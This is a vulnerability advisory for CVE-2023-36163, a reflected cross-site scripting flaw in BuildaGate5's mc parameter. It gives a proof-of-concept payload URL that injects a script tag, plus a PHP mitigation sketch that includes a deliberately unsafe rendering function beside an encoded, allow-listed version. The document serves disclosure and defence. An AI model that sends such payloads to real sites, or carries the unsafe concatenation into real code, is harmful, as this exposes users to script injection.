Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL

TraiLeR2/CVE-2023-36163


Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)

Date: 06/07/2023

Exploit Author: Idan Malihi

Vendor Homepage: None

Version: 5

Tested on: Microsoft Windows 10 Pro

CVE: CVE-2023-36163

PoC:

The attacker finds the vulnerable parameter (mc=) and injects JS code such as: '><script>prompt("XSS");</script><div id="aa

The attacker must then send the full URL containing the JS code to the victim; the code executes in the victim's browser when the URL is opened.

#Payload: company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
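
Mitigation sketch (an added example, not code from BuildaGate5 or from the PoC author): the payload above closes a single-quoted attribute before opening a script tag, so the fix is to encode the value for the HTML attribute context, quotes included. The markup, the function names and the allow-list format for mc are assumptions, since the application's source is not shown here.

```php
<?php
// Hypothetical reconstruction of the reflection context. The real
// company_search_tree.php source is not public on this page.

// Vulnerable pattern: the request value is copied verbatim into a
// single-quoted attribute, so a leading '> ends the attribute and the tag.
function render_unsafe(string $mc): string
{
    return "<input type='hidden' name='mc' value='" . $mc . "'>";
}

// Hardened pattern: encode for the HTML attribute context.
// ENT_QUOTES encodes both ' and ", which matters because the attribute
// is single-quoted; ENT_SUBSTITUTE replaces invalid UTF-8 sequences
// instead of returning an empty string.
function render_safe(string $mc): string
{
    $encoded = htmlspecialchars($mc, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<input type='hidden' name='mc' value='" . $encoded . "'>";
}

// Defence in depth: reject values outside the expected shape before use.
// The pattern is an assumption; adjust it to what mc legitimately carries.
function validate_mc(string $mc): ?string
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $mc) === 1 ? $mc : null;
}

// Value of mc taken from the payload line on this page.
$payload = 'aaa\'><script>prompt("XSS");</script><div id="aaaa';

echo "unsafe: ", render_unsafe($payload), PHP_EOL; // markup breaks out of the attribute
echo "safe:   ", render_safe($payload), PHP_EOL;   // value stays inert text inside value='...'

var_dump(validate_mc($payload)); // rejected by the allow-list
var_dump(validate_mc('aaa'));    // accepted
```

Output encoding at the point of reflection is the primary fix; the allow-list only narrows what reaches the template.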
